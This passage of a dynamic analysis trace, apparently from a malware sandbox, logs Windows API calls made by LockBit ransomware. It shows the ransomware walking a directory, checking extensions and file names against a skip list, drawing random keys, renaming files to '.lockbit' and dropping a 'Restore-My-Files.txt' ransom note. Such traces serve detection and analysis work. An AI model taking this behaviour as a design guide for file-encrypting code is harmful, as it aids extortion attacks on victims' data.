returned 1 [0142.931] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0145272.JPG") returned -1 [0142.932] lstrcmpiW (lpString1="autorun.inf", lpString2="J0145272.JPG") returned -1 [0142.932] lstrcmpiW (lpString1="thumbs.db", lpString2="J0145272.JPG") returned 1 [0142.932] lstrcmpiW (lpString1="iconcache.db", lpString2="J0145272.JPG") returned -1 [0142.932] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0142.932] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145272.JPG") returned=".JPG" [0142.932] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0142.932] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0142.932] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0142.932] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0142.932] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0142.932] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0142.932] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0142.932] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0142.932] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0142.932] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0142.932] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0142.932] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0142.932] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0142.932] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0142.932] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0142.932] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0142.932] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0142.933] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0142.933] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0142.933] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0142.933] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0142.933] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0142.933] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0142.933] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0142.933] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0142.933] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0142.933] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0142.933] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0142.933] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145272.JPG.lockbit") returned 72 [0142.933] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145272.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145272.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0142.934] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0142.934] malloc (_Size=0x40068) returned 0x1ff1e60 [0142.934] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=49238) returned 1 [0142.934] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.935] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.935] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0142.935] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.935] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.935] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0142.936] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0142.940] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145272.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145272.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0142.940] malloc (_Size=0xa6) returned 0x77d7a8 [0142.940] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0142.941] free (_Block=0x77d7a8) [0142.941] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145272.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0142.941] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0142.941] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0142.941] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f01310, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x5285, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0145361.JPG", cAlternateFileName="")) returned 1 [0142.942] lstrcmpiW (lpString1=".", lpString2="J0145361.JPG") returned -1 [0142.942] lstrcmpiW (lpString1="..", lpString2="J0145361.JPG") returned -1 [0142.942] PathFindExtensionW (pszPath="J0145361.JPG") returned=".JPG" [0142.942] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0142.942] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0142.942] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0142.942] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0142.942] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0142.942] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0142.942] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0142.942] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0142.942] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0142.942] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0142.942] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0142.942] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0142.942] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0142.942] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0142.942] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0142.942] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0142.942] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0142.943] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0142.943] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0142.943] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0142.943] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0142.943] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0142.943] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0142.943] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0142.943] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0142.943] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0142.943] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0142.943] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0142.943] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0142.943] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0142.943] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0142.943] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0142.943] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0142.943] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0142.943] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0142.943] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0142.944] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0142.944] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0142.944] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0142.944] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0142.944] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0142.944] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0142.944] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0142.944] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0142.944] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0142.944] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0142.944] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0142.944] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0145361.JPG") returned 1 [0142.944] lstrcmpiW (lpString1="ntldr", lpString2="J0145361.JPG") returned 1 [0142.944] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0145361.JPG") returned 1 [0142.944] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0145361.JPG") returned -1 [0142.944] lstrcmpiW (lpString1="autorun.inf", lpString2="J0145361.JPG") returned -1 [0142.944] lstrcmpiW (lpString1="thumbs.db", lpString2="J0145361.JPG") returned 1 [0142.945] lstrcmpiW (lpString1="iconcache.db", lpString2="J0145361.JPG") returned -1 [0142.945] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0142.945] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145361.JPG") returned=".JPG" [0142.945] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0142.945] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0142.945] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0142.945] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0142.945] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0142.945] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0142.945] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0142.945] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0142.945] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0142.945] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0142.945] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0142.945] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0142.945] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0142.945] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0142.945] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0142.945] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0142.945] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0142.946] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0142.946] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0142.946] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0142.946] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0142.946] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0142.946] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0142.946] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0142.946] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0142.946] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0142.946] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0142.946] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0142.946] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145361.JPG.lockbit") returned 72 [0142.946] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145361.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145361.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0142.947] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0142.947] malloc (_Size=0x40068) returned 0x3df0008 [0142.947] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=21125) returned 1 [0142.947] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.948] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0142.948] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.948] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0142.948] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0143.385] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145361.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145361.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0143.386] malloc (_Size=0xa6) returned 0x77d7a8 [0143.386] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0143.403] free (_Block=0x77d7a8) [0143.403] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145361.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0143.404] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0143.407] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0143.407] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5c5e300, ftCreationTime.dwHighDateTime=0x1bdbf70, ftLastAccessTime.dwLowDateTime=0x65f27470, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd5c5e300, ftLastWriteTime.dwHighDateTime=0x1bdbf70, nFileSizeHigh=0x0, nFileSizeLow=0x45cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0145373.JPG", cAlternateFileName="")) returned 1 [0143.407] lstrcmpiW (lpString1=".", lpString2="J0145373.JPG") returned -1 [0143.407] lstrcmpiW (lpString1="..", lpString2="J0145373.JPG") returned -1 [0143.407] PathFindExtensionW (pszPath="J0145373.JPG") returned=".JPG" [0143.407] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0143.407] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0143.407] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0143.407] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0143.407] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0143.407] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0143.408] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0143.408] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0143.408] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0143.408] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0143.408] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0143.408] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0143.408] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0143.408] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0143.408] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0143.408] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0143.457] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0143.465] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0143.466] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0143.466] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0143.466] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0143.466] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0143.466] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0143.466] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0143.466] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0143.466] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0143.466] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0143.466] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0143.466] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0143.466] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0143.466] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0143.466] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0143.466] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0143.466] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0143.466] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0143.466] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0143.466] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0143.466] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0143.476] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0143.476] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0143.476] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0143.477] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0143.477] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0143.477] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0143.477] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0143.477] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0143.477] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0143.477] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0145373.JPG") returned 1 [0143.477] lstrcmpiW (lpString1="ntldr", lpString2="J0145373.JPG") returned 1 [0143.477] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0145373.JPG") returned 1 [0143.477] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0145373.JPG") returned -1 [0143.477] lstrcmpiW (lpString1="autorun.inf", lpString2="J0145373.JPG") returned -1 [0143.477] lstrcmpiW (lpString1="thumbs.db", lpString2="J0145373.JPG") returned 1 [0143.477] lstrcmpiW (lpString1="iconcache.db", lpString2="J0145373.JPG") returned -1 [0143.477] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0143.477] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG") returned=".JPG" [0143.477] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0143.477] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0143.477] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0143.477] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0143.477] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0143.477] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0143.477] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0143.477] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0143.477] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0143.581] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0143.581] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0143.581] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0143.581] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0143.581] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0143.581] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0143.581] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0143.581] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0143.581] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0143.581] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0143.582] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0143.582] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0143.584] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0143.593] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0143.593] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0143.593] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0143.593] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0143.593] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0143.593] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0143.640] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG.lockbit") returned 72 [0143.640] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145373.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0143.641] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0143.642] malloc (_Size=0x40068) returned 0x1ff1e60 [0143.642] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=17867) returned 1 [0143.642] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0143.642] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0143.642] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0143.642] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0143.643] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0143.643] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0143.643] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0143.647] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0143.647] malloc (_Size=0xa6) returned 0x77d7a8 [0143.647] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0143.648] free (_Block=0x77d7a8) [0143.648] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0143.648] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0143.648] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0143.648] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17a35900, ftCreationTime.dwHighDateTime=0x1bdbf72, ftLastAccessTime.dwLowDateTime=0x65f27470, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x17a35900, ftLastWriteTime.dwHighDateTime=0x1bdbf72, nFileSizeHigh=0x0, nFileSizeLow=0x7c6a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0145669.JPG", cAlternateFileName="")) 